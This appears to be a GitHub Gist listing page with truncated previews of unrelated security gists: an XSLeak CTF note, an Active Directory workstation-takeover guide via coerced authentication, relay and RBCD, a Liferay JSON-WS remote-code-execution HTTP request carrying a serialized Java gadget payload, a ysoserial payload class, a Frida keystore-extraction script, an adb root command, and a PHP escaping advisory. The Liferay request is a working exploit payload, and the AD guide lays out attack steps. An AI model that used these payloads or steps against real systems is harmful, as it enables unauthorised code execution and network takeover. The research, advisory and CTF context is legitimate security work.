Lazy loading images + Scroll to Text Fragment XSLeak.
With Water Paddler.
We can upload images, make "notes" containing this image and a title, and share this "notes" with an authed bot displaying the flag in its footer.
Rioru rioru
gladiatx0r
/ Workstation-Takeover.md
Last active
June 23, 2024 22:01
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
testanull
/ LiferayRce.txt
Last active
December 18, 2023 03:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /api/jsonws/invoke HTTP/1.1 | |
| Host: <Host> | |
| Connection: close | |
| cmd2: whoami | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 4912 | |
| cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package ysoserial.payloads; | |
| import com.mchange.lang.ByteUtils; | |
| import org.apache.commons.collections.Transformer; | |
| import org.apache.commons.collections.functors.ChainedTransformer; | |
| import org.apache.commons.collections.functors.ConstantTransformer; | |
| import org.apache.commons.collections.functors.InvokerTransformer; | |
| import org.apache.commons.collections.keyvalue.TiedMapEntry; | |
| import org.apache.commons.collections.map.LazyMap; | |
| import ysoserial.payloads.annotation.Authors; |
ceres-c
/ frida-extract-keystore.py
Last active
April 5, 2024 19:22
Automatically extract KeyStore objects and relative password from Android applications with Frida - Read more: https://ceres-c.it/2018/12/16/frida-android-keystore/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| ''' | |
| author: ceres-c | |
| usage: ./frida-extract-keystore.py | |
| Once the keystore(s) have been exported you have to convert them to PKCS12 using keytool | |
| ''' | |
| import frida, sys, time |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //////// | |
| // The vm module lets you run a string containing javascript code 'in | |
| // a sandbox', where you specify a context of global variables that | |
| // exist for the duration of its execution. This works more or less | |
| // well, and if you're in control of the code that's running, and you | |
| // have a reasonable protocol in mind// for how it expects a certain | |
| // context to exist and interacts with it --- like, maybe a plug-in | |
| // API for a program, with some endpoints defined for it that do | |
| // useful domain-specific things --- your life can go smoothly. |
Gain adb root.
$ adb shell am start -n com.android.engineeringmode/.qualcomm.DiagEnabled --es "code" "angela"
Download Magisk-v14.0 and extract it somewhere. Download MagiskManager.
cji
/ win_vm_kerneldbg.md
Last active
April 30, 2021 13:07
Steps to successfully debug the Windows kernel between 2 VMWare VMs
Open the debugger VM's .vmx file. delete the existing serial0 lines (used for printing, not needed) add these lines:
serial0.present = "TRUE"
serial0.pipe.endPoint = "client"
serial0.fileType = "pipe"
serial0.yieldOnMsrRead = "TRUE"
serial0.tryNoRxLoss = "FALSE"
serial0.startConnected = "TRUE"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $> brew install openssl | |
| $> brew install swig | |
| $> env LDFLAGS="-L$(brew --prefix openssl)/lib" \ | |
| CFLAGS="-I$(brew --prefix openssl)/include" \ | |
| SWIG_FEATURES="-cpperraswarn -includeall -I$(brew --prefix openssl)/include" \ | |
| pip install m2crypto |
Zenexer
/ escapeshellrce.md
Last active
November 2, 2023 06:09
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure
Paul Buonopane paul@namepros.com at NamePros
PGP: https://keybase.io/zenexer
I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.
This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's [CVE-2016-10033][CVE-2016-10033], [CVE-2016-10045][CVE-2016-10045], and [CVE-2016-10074][CVE-2016-10074]. It assumes prior understanding of these vulnerabilities.
This advisory does not yet have associated CVE identifiers.
NewerOlder